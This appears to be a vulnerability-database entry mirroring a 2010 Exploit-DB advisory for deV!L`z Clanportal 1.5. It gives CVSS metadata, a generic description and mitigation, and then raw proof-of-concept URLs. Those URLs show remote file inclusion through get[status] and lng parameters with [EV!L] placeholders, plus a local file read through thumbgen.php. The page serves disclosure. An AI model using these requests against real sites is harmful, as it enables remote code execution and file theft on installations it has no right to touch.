deV!L`z Clanportal V1.5 Mullti Vulnerability

vendor:

CMS

by:

indoushka

8,8

CVSS

HIGH

Location Replace and RFI

CWE

Product Name: CMS

Affected Version From: V1.5

Affected Version To: V1.5

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)

2010

deV!L`z Clanportal V1.5 Mullti Vulnerability

The vulnerability allows an attacker to inject malicious code into the vulnerable application. The attacker can inject malicious code into the vulnerable application by using the 'Location Replace' and 'RFI' techniques. The attacker can use the 'Location Replace' technique to inject malicious code into the vulnerable application by sending a crafted URL to the vulnerable application. The attacker can use the 'RFI' technique to inject malicious code into the vulnerable application by sending a crafted URL to the vulnerable application. The attacker can also use the 'RFI' technique to gain access to sensitive information stored on the vulnerable application.

Mitigation:

The application should be configured to only accept requests from trusted sources. The application should also be configured to validate all user input and reject any malicious input.

Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : deV!L`z Clanportal V1.5 Mullti Vulnerability           
| # Author   : indoushka                                                               
| # email    : indoushka@hotmail.com                                                   
| # Home     : www.iqs3cur1ty.com/vb                                                                                                                                                                                                             
| # Script   : CMS © 2005 - 2010 by deV!L`z Clanportal - supported by TEMPLATEbar.de      
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       
| # Bug      : Mullti    
| # Download : freewebtown.com/indoushka/indoushka/dzcp1.5.3.zip                                                                  
======================      Exploit By indoushka       =================================
 # Exploit  : 
 
 1 - location replace :
 
 http://127.0.0.1/dzcp1.5.3/thumbgen.php?img=[d:\11.jpg]
 
 2- RFI :

http://localhost/dzcp1.5.3/server/index.php?get[status]=[EV!L]

http://localhost/dzcp1.5.3/inc/bbcode.php?lng=[EV!L]

http://localhost/dzcp1.5.3/inc/menu-functions/server.php?get[status]=[EV!L]

Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ====================
Greetz : 
Exploit-db Team : 
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * www.sa-hacker.com *  www.alkrsan.net * www.mormoroth.net * MR.SoOoFe * ThE g0bL!N
------------------------------------------------------------------------------------------------------------------------